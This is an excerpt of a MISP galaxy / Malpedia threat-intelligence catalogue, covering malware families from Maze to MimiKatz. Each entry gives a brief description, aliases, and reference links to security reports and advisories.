https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md

https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/

https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.secureworks.com/research/threat-profiles/gold-village

https://securelist.com/targeted-ransomware-encrypting-data/99255/

https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/

https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/

https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf

https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/

https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html

https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update

https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/

https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/

https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.docdroid.net/dUpPY5s/maze.pdf

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U

https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/

https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html

https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html

https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

http://www.secureworks.com/research/threat-profiles/gold-village

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/

https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/

https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://oag.ca.gov/system/files/Letter%204.pdf

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/

https://securelist.com/maze-ransomware/99137/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/

https://adversary.crowdstrike.com/adversary/twisted-spider/

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://sites.temple.edu/care/ci-rw-attacks/

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f

https://twitter.com/certbund/status/1192756294307995655

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

MBR Locker

Ransomware overwriting the system’s MBR, making it impossible to boot into Windows.

The tag is: misp-galaxy:malpedia="MBR Locker"

MBR Locker is also known as:

Table 3982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker

https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html

Medre

The tag is: misp-galaxy:malpedia="Medre"

Medre is also known as:

Table 3985. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.medre

http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html

MedusaLocker

A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.

The tag is: misp-galaxy:malpedia="MedusaLocker"

MedusaLocker is also known as:

  • AKO Doxware

  • AKO Ransomware

  • MedusaReborn

Table 3987. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://asec.ahnlab.com/en/48940/

https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-181a

https://twitter.com/siri_urz/status/1215194488714346496?s=20

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/

https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/

https://www.cybereason.com/blog/medusalocker-ransomware

https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf

https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html

http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://blog.talosintelligence.com/2020/04/medusalocker.html

https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/

https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/

MegaCortex

Megacortex is a ransomware used in targeted attacks against corporations. Once the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.

The tag is: misp-galaxy:malpedia="MegaCortex"

MegaCortex is also known as:

Table 3989. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://blog.malwarebytes.com/detections/ransom-megacortex/

https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://threatpost.com/megacortex-ransomware-mass-distribution/146933/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries

https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/

https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/

MeguminTrojan

Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).

The tag is: misp-galaxy:malpedia="MeguminTrojan"

MeguminTrojan is also known as:

Table 3991. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin

https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

Melcoz

The tag is: misp-galaxy:malpedia="Melcoz"

Melcoz is also known as:

Table 3993. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.melcoz

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

Meow

According to PCrisk, MEOW is ransomware based on other ransomware called CONTI. MEOW encrypts files and appends the ".MEOW" extension to their filenames. It also drops the "readme.txt" file (a ransom note). An example of how MEOW ransomware modifies filenames: it renames "1.jpg" to "1.jpg.MEOW", "2.png" to "2.png.MEOW", and so forth.

The tag is: misp-galaxy:malpedia="Meow"

Meow is also known as:

Table 3994. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.meow

https://id-ransomware.blogspot.com/2022/09/meow-ransomware.html

Mespinoza

Mespinosa is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension "pysa" is probably derived from the Zanzibari Coin with the same name.

The tag is: misp-galaxy:malpedia="Mespinoza"

Mespinoza is also known as:

  • pysa

Table 3998. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf

https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf

https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/

https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/

https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://twitter.com/inversecos/status/1456486725664993287

https://twitter.com/campuscodi/status/1347223969984897026

https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html

https://www.ic3.gov/Media/News/2021/210316.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/

https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/

MetadataBin

Ransomware.

The tag is: misp-galaxy:malpedia="MetadataBin"

MetadataBin is also known as:

  • Ransomware32

Table 3999. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin

https://id-ransomware.blogspot.com/2020/10/metadata-bin-ransomware.html

Metamorfo

According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.

The tag is: misp-galaxy:malpedia="Metamorfo"

Metamorfo is also known as:

  • Casbaneiro

Table 4001. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo

https://twitter.com/MsftSecIntel/status/1418706916922986504

https://cofense.com/blog/autohotkey-banking-trojan/

https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf

https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerou

https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html

https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md

https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam

https://blog.ensilo.com/metamorfo-avast-abuser

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf

Meterpreter (Windows)

The tag is: misp-galaxy:malpedia="Meterpreter (Windows)"

Meterpreter (Windows) is also known as:

Table 4004. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter

https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/

https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/

http://schierlm.users.sourceforge.net/avevasion.html

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

https://asec.ahnlab.com/ko/26705/

https://blog.morphisec.com/fin7-attacks-restaurant-industry

https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://asec.ahnlab.com/en/56236/

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://explore.group-ib.com/htct/hi-tech_crime_2018

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf

https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/

https://redcanary.com/blog/getsystem-offsec/

https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea

https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html

https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

http://www.secureworks.com/research/threat-profiles/gold-winter

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf

https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf

https://asec.ahnlab.com/en/53046/

Mewsei

The tag is: misp-galaxy:malpedia="Mewsei"

Mewsei is also known as:

Table 4006. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei

Miancha

The tag is: misp-galaxy:malpedia="Miancha"

Miancha is also known as:

Table 4008. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha

Midas

This malware written in C# is a variant of the Thanos ransomware family and emerged in October 2021 and is obfuscated using SmartAssembly. In 2022, ThreatLabz analysed a report of Midas ransomware was slowly deployed over a two month period (ZScaler). This ransomware features also its own data leak site as part of its double extortion strategy.

The tag is: misp-galaxy:malpedia="Midas"

Midas is also known as:

Table 4013. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.midas

https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/

https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants

https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/

Mikoponi

The tag is: misp-galaxy:malpedia="Mikoponi"

Mikoponi is also known as:

Table 4014. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi

https://www.anomali.com/blog/targeted-ransomware-activity

MILKMAID

The tag is: misp-galaxy:malpedia="MILKMAID"

MILKMAID is also known as:

Table 4016. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Milum

In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.

The tag is: misp-galaxy:malpedia="Milum"

Milum is also known as:

Table 4017. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.milum

https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/

https://securelist.com/wildpressure-targets-macos/103072/

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

Mimic Ransomware

According to PCrisk, Mimic is a ransomware-type program. Malware within this classification is designed to encrypt data and demand ransoms for decryption. Evidence suggests that Mimic is based on the leaked CONTI ransomware builder. Mimic campaigns have been observed targeting English and Russian speaking users.

The tag is: misp-galaxy:malpedia="Mimic Ransomware"

Mimic Ransomware is also known as:

Table 4019. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic

https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html

MimiKatz

Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.

Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.

The tag is: misp-galaxy:malpedia="MimiKatz"

MimiKatz is also known as:

Table 4020. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups

https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.secureworks.com/research/threat-profiles/gold-drake

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://asec.ahnlab.com/en/56236/

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.slideshare.net/yurikamuraki5/active-directory-240348605

https://blog.xpnsec.com/exploring-mimikatz-part-1/

